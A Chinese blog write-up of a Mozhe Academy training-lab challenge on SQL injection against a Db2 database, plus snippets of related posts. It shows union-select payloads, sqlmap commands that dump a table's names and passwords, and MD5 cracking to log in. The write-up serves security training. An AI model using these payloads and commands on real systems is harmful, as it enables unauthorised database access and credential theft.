【墨者学院】“SQL手工注入漏洞测试(Db2数据库)”详细通关

最新推荐文章于 2024-07-23 03:34:02 发布
最新推荐文章于 2024-07-23 03:34:02 发布
阅读量380 收藏 7
点赞数 8
文章标签: web安全 网络安全 网络攻击模型 安全威胁分析 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54407057/article/details/140618698
版权

废话不多说直接开始

 目标

1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解Db2的数据结构;
4.了解字符串的MD5加解密;

第一步

进入SQL手工注入漏洞测试(Db2数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养

启动环境

第二步

启动环境,寻找注入点

//寻找一通后发现登录框下方的通知处是另一个存在注入点的网页//

第三步

开始尝试注入测试

  • 单引号测试(发现异常)
  • 利用id=2-1进行测试(发现是数字型注入)
  • 利用 order by 进行测试列数(发现五列)
  • 开始联合查询(发现回显) 
    id=-1 union select 1,2,3,4 from syscat.tables

第四步

因为手敲太麻烦,而且DB2数据库语法和SQL不一样,所以选择利用工具SQLmap工具进行爆库爆表爆数据

sqlmap -u "http://124.70.71.251:45418/new_list.php?id=1" --dbs --dump --threads 8 --batch

直接选择全部--dump 一波爆

因为数据库类型原因,所以在最后数据中并没有直接爆出账号和密码

利用上面数据开始爆

sqlmap -u "http://124.70.71.251:45418/new_list.php?id=1" -D "DB2INST1" -T "GAME_CHARACTER" -C "name","password" --threads 8 --batch --dump

最后一步

利用md5进行解密密码(MD5免费在线解密破解_MD5在线加密-SOMD5

利用得到的用户名和密码尝试登录

解题结束!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1

星仔6364
关注
DB2数据库SQL注入语句
02-17
可以试试学习一下,不可以滥用, 猜用户表数量: and 0<(SELECT count(NAME) FROM SYSIBM.SYSTABLES where CREATOR=USER)
墨者 - SQL手工注入漏洞测试(Db2数据库)
吃肉唐僧的博客
07-11 2769
进入环境,用order by测试,发现可以,并测试到字段为4 接下来用union select 1,2,3,4 发现失败 后来上网看了别人的思路是union select 1,2,3,4 from sysibm.systables就可以回显了 应该是不同的数据库语法问题 爆库 id=2 union select 1,2,current schema,4 from sysibm...
sqlinjection in db2数据库
Coisini的博客
05-25 330
使用DB2的人比较少了,今天碰到了一个可供注入DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。 参考了IBM DB2的文档,总结了这样几条: 1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER 可以返回系统中所有用户创建的表(table)名 2、select NAME from SYSIBM.SYSCOLUMNS ...
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册1
墨者靶场】sql注入Db2数据库
qq_70836100的博客
07-22 216
地址:https://www.mozhe.cn/bug/detail/NjM3MSt5VWovcWtHOU9kaUF5dUFXQT09bW96aGUmozhe。2.此题思路是去找注入点,点击图中的通知,没有就刷新。8.这里需要对密码进行解码,再登陆就会有KEY。这里的字段name,password被隐藏了。3.使用sqlmap,查询数据库。1.首先启动(3墨币)7.查password。
墨者学院SQL手工注入漏洞测试(MySQL数据库)
Chris_HackFromCN的博客
08-12 688
Do what you said,say what you can do 做你说过的,说你能做的 关于手工注入,网上已经有很多教程,本文讲解的是使用SQLmap工具来对该关卡进行注入,最后找到key。 首先打开靶场环境,可以看到用户登录的场景,里面包含账号和密码两个输入框。 对账号密码输入框进行注入测试,但都不成功,此时发现在登录按钮下面有一条维护通知,于是点进去.... 3. 如上图所示,进入到维护通知页面之后,发现其URL地址栏带有参数id,猜测该参数可能是注...
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
qq_43623470的博客
01-16 2991
1,http://219.153.49.228:48730/new_list.php?id=1 and 1=1 不报错 http://219.153.49.228:48730/new_list.php?id=1 and 1=2 报错,发现注入点 2,http://219.153.49.228:48730/new_list.php?...
墨者_SQL手工注入漏洞测试(Sybase数据库)
weixin_50698958的博客
10-23 739
靶场: https://www.mozhe.cn/bug/detail/b0R2Q0VJL3lnellUMjJoUmRsK1FsZz09bW96aGUmozhe 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Apache+PHP+Sybase,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Sybase的数据结构; 4.了解字符串的MD5加解密; 解题方向 手工进行
sql注入(2) 墨者学院SQL手工注入漏洞测试(MySQL数据库-字符型)
c10udz的博客
04-12 4169
这里我们可以看到版本是10.2.15,前面说过MySQL5.0版本以上有个自带的information_shema数据库,利用这个数据库可以查到整个数据库的结构,不然就只能盲猜了。//注释:(1)information_schema.tables表示information_schena这个数据库下的表,在MySQL中【.】代表下一级。利用'order by 任意数字 %23去判断,得到4(结尾加%23的原因:在一个语句结尾时,需要用#结尾,而#的url编码就是%23)table_schema:数据库名。
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)
Lollipop_zhi的博客
02-26 2275
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
sql注入工具sqlmap
06-16
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,是ctf sql注入题的必备帮手
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 3955
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入是字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
DB2数据库注入
Vi_vids的博客
03-26 1329
db2数据库 这里使用的靶场为墨者学院在线靶场 确定字段数 确定回显位 id=-1 union select 1,2,3,4 from syscat.tables 查看数据库基本信息/爆库 爆表可以使用的表可以是syscat.tables,也可以是syscat.columns、sysibm.sysdummy1 科普时间 sysibm.sysdummy1 表是DB2数据库中的系统表,存放着系统的相关信息 id=-1 union select 1,current schema,current s
SQL手工注入漏洞测试(Db2数据库)
最新发布
Jz031212的博客
07-23 229
id=1 -D DB2INST1 -T GAME_CHARACTER -C password --dump查出表中数据。id=1 --current-db查出当前的数据库。使用md5解密工具解除密码。利用sqlmap查出库名。然后登录就可以进去了。
墨者学院 SQL手工注入漏洞测试(Db2数据库) 两种思路 超详细 小白也能看懂
qq_48368964的博客
07-22 658
墨者学院 SQL手工注入漏洞测试(Db2数据库) 两种思路 超详细 小白也能看懂
web渗透--23--SQL注入(下)
武天旭的博客
09-15 1439
6、各数据库注入 注:释义中的'-'代表和上一个一样,因为一个释义可能有几种形式的SQL语句嘛,下同 6.1、DB2数据库 释义 SQL语句 其他 当前数据库 select current server from sysibm.sysdummy1 - 所有数据库 SELECT schemaname FROM syscat.schemata
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值